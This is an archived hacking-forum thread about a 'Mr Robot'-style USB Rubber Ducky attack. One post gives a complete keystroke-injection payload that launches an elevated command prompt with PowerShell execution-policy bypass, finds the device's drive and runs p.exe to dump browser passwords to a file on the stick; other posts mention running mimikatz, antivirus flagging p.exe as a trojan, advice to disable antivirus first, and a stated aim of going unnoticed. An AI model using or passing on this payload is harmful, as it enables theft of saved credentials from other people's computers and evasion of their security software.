Jump to content

Archived

This topic is now archived and is closed to further replies.

M@$T

Mr Robot Hack

Recommended Posts

Keep in mind, this is not what I intended to release. This was just a few hours work taking two separate tools already available, heavily gutting and jerry-rigging it just enough that I knew that it would work in concept. Prior to starting this project, I had zero experience in Powershell (besides using it to run common/simple things often used in CMD), so I was teaching myself as I went by tracing the code already there and experimenting. If you see some edit's I've made and it looks sloppy as all hell, or there's multiple lines of code that could easily be a few bits of code, or you see redundant variables/daisy-chained variables, it's probably because I was changing little bits of code around to test and learn, after which I know there is a ton of code cleanup to do as well as removing lots of unnecessary code leftover from separate functions the tool could do for which I didn't have any use. But, if anyone sees any errors that would be a good learning opportunity, I would love to hear what you have to say. I'm a sponge for knowledge and I look forward to slowly tweaking everything and making it efficient and adding a handful of other handy features.

 

TL;DR - I'm brand new as Powershell. It's messy. I'm sorry, but I'm just sharing what I have in hopes other newbies at PS can learn something as well. Hopefully someone finds something useful here, or at least can serve as a springboard for some way cooler shit.

 

Cheers,

-Enzym3

Share this post


Link to post
Share on other sites
On 9/14/2016 at 2:50 PM, EvilTtaM said:

I attached the Ducky Code I used, If there are any suggestions for changes please let me know. I will add that this code assumes that the executionpolicy is set to bypass, however it could be written in to change that. 

15secondhack.txt

Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?

Share this post


Link to post
Share on other sites

Thanks for all this Enzym3.

Question about p.exe or this payload in general. Does it get caught by anti-virus programs since it's an .exe?

 

Share this post


Link to post
Share on other sites

Is there a way you can make it so i can run it on the normal duck instead of the twin duck? either way thanks

Share this post


Link to post
Share on other sites
On 2016-12-08 at 6:42 PM, Mr.X said:

Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?

I got the same error for whiterabbit.ps1

Share this post


Link to post
Share on other sites

Here is a payload that will run the p.exe using command prompt instead of powershell...

I wanted this because not all computers have powershell enabled but they all have command prompt ;)

DELAY 1200
GUI R
DELAY 300
STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"
DELAY 200
ENTER
DELAY 500
ALT y
DELAY 100
LEFTARROW
DELAY 200
DELETE
DELAY 200
STRING mode con lines=1 cols=18
DELAY 80
ENTER
DELAY 80
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d
DELAY 250
ENTER
DELAY 200
STRING %duck%
ENTER
DELAY 150
STRING p.exe /stext pass.txt
DELAY 100
ENTER
DELAY 2000
STRING exit
DELAY 80
ENTER

I'm not 100% sure why I need the LEFTARROW or DELETE commands, I'm thinking of taking them out but I also grabbed portions of this from elsewheres of course and they were there.

Open to suggestions.

Share this post


Link to post
Share on other sites

Sorry forgot to mention that p.exe grabs the browser passwords and you need the twin duck firmware installed to be able to save them onto the USB in this script.

 

Share this post


Link to post
Share on other sites
15 hours ago, authorityfinger said:

Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :(

Ha yea, it gets caught by Antivirus. You have to disable them before inserting the ducky. Then you're fine.

Share this post


Link to post
Share on other sites

See, that's the thing. I know we are just being a bunch of script kiddies and that is why AV is detecting us, but there needs to be a way to go unnoticed. I mean, that is the purpose of this isn't it?

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...